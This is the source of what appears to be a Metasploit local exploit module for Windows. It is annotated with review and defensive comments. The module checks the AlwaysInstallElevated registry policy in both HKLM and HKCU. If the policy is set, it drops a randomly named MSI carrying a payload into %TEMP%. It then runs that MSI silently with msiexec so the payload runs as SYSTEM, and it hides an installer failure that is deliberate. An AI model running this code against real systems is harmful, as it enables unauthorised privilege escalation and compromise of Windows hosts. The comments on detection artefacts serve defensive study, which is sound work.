GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/local/always_install_elevated.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Local module for the Windows Installer "AlwaysInstallElevated" policy.
#
# #check reads the policy value in both HKLM and HKCU and reports Vulnerable
# only when both are present and non-zero; #exploit then drops a generated
# .MSI into %TEMP% and runs it through msiexec (see 'Description' below for
# the intended installer behaviour). From a defensive standpoint the check
# logic shows the condition that matters: a missing or 0 value in EITHER hive
# makes the module report Safe, and the runtime artefacts are a random-named
# .msi under %TEMP% plus an msiexec.exe "/package" invocation against it.
class MetasploitModule < Msf::Exploit::Local
  Rank = ExcellentRanking

  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include Msf::Post::File
  include Msf::Post::Windows::Registry

  # Registers module metadata and two advanced options:
  #   LOG_FILE - optional remote path handed to msiexec as "/l* <path>" (nil = no logging)
  #   QUIET    - when true (default) msiexec is run with "/quiet"
  # 'MSI::UAC' => true is set as a default option; its effect is handled by the
  # framework's MSI generation, not by code in this file — confirm there if needed.
  def initialize(info={})
    super(update_info(info, {
      'Name' => 'Windows AlwaysInstallElevated MSI',
      'Description' => %q{
        This module checks the AlwaysInstallElevated registry keys which dictates if
        .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM).
        The generated .MSI file has an embedded executable which is extracted and run
        by the installer. After execution the .MSI file intentionally fails installation
        (by calling some invalid VBS) to prevent it being registered on the system.
        By running this with the /quiet argument the error will not be seen by the user.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Ben Campbell',
          'Parvez Anwar' # discovery?/inspiration
        ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Platform' => [ 'win' ],
      'SessionTypes' => [ 'meterpreter' ],
      'DefaultOptions' =>
        {
          'WfsDelay' => 10,
          'EXITFUNC' => 'process',
          'MSI::UAC' => true
        },
      'Targets' =>
        [
          [ 'Windows', { } ],
        ],
      'References' =>
        [
          [ 'URL', 'http://www.greyhathacker.net/?p=185' ],
          [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
          [ 'URL', 'http://rewtdance.blogspot.co.uk/2013/03/metasploit-msi-payload-generation.html']
        ],
      'DisclosureDate'=> '2010-03-18',
      'DefaultTarget' => 0
    }))

    register_advanced_options([
      OptString.new('LOG_FILE', [false, 'Remote path to output MSI log file to.', nil]),
      OptBool.new('QUIET', [true, 'Run the MSI with the /quiet flag.', true])
    ])
  end

  # Reads AlwaysInstallElevated under SOFTWARE\Policies\Microsoft\Windows\Installer,
  # first in HKEY_LOCAL_MACHINE and then in HKEY_CURRENT_USER.
  #
  # @return [Msf::Exploit::CheckCode] Vulnerable only when both values exist and
  #   are non-zero; Safe when either value is nil (absent or unreadable) or 0.
  #   The HKCU value is only queried once the HKLM value has passed, so a host
  #   with the machine policy unset costs a single registry read.
  def check
    install_elevated = "AlwaysInstallElevated"
    installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
    hkcu = "HKEY_CURRENT_USER\\#{installer}"
    hklm = "HKEY_LOCAL_MACHINE\\#{installer}"

    local_machine_value = registry_getvaldata(hklm,install_elevated)

    if local_machine_value.nil?
      # nil covers both "value absent" and "key not readable"; both are treated as Safe.
      vprint_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif local_machine_value == 0
      # NOTE(review): the == 0 test presumes registry_getvaldata returns an Integer
      # for REG_DWORD data — a String "0" would fall through to the else branch; confirm.
      vprint_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      vprint_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
      # Assigned inside the branch; the local remains in scope after the if, and
      # the other branches return early so it is never read as nil by accident.
      current_user_value = registry_getvaldata(hkcu,install_elevated)
    end

    if current_user_value.nil?
      vprint_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
      return Msf::Exploit::CheckCode::Safe
    elsif current_user_value == 0
      vprint_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Safe
    else
      vprint_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
      return Msf::Exploit::CheckCode::Vulnerable
    end
  end

  # Uploads the generated MSI to the target's %TEMP% and executes it with msiexec.
  #
  # Runs only when #check returns Vulnerable. The dropped file is registered with
  # FileDropper so it is removed during session cleanup. msiexec's output is shown
  # only in verbose mode; if cmd_exec raises Rex::TimeoutError, +result+ is never
  # assigned and the closing vprint_status interpolates nil as an empty string.
  def exploit

    return unless check == Msf::Exploit::CheckCode::Vulnerable

    # rand(8) yields 0..7, so the basename is 6..13 random alphabetic characters.
    msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
    # Supplied by an included mixin (presumably Msf::Exploit::EXE); builds the MSI
    # that wraps the configured payload — see that mixin for the embedding details.
    msi_source = generate_payload_msi

    # Upload MSI
    # expand_path presumably resolves %TEMP% on the target; .strip removes any
    # trailing newline from the returned path before it is reused below.
    msi_destination = expand_path("%TEMP%\\#{msi_filename}").strip
    print_status("Uploading the MSI to #{msi_destination} ...")

    write_file(msi_destination, msi_source)
    register_file_for_cleanup(msi_destination)

    # Optional "/l* <path> " logging switch. NOTE(review): LOG_FILE and
    # msi_destination are interpolated without quotes, so a path containing
    # spaces would be split by msiexec's argument parsing and the run would fail.
    if datastore['LOG_FILE'].nil?
      logging = ""
    else
      logging = "/l* #{datastore['LOG_FILE']} "
    end

    # "/quiet" hides the intentional installation-failure dialog mentioned in 'Description'.
    if datastore['QUIET']
      quiet = "/quiet "
    else
      quiet = ""
    end

    # Both switch strings carry their own trailing space, hence no separator here.
    cmd = "msiexec.exe #{logging}#{quiet}/package #{msi_destination}"

    print_status("Executing MSI...")
    vprint_status("Executing: #{cmd}")
    begin
      result = cmd_exec(cmd)
    rescue Rex::TimeoutError
      # Treated as non-fatal: the installer may outlive the command timeout.
      vprint_status("Execution timed out.")
    end
    vprint_status("MSI command-line feedback: #{result}")
  end
end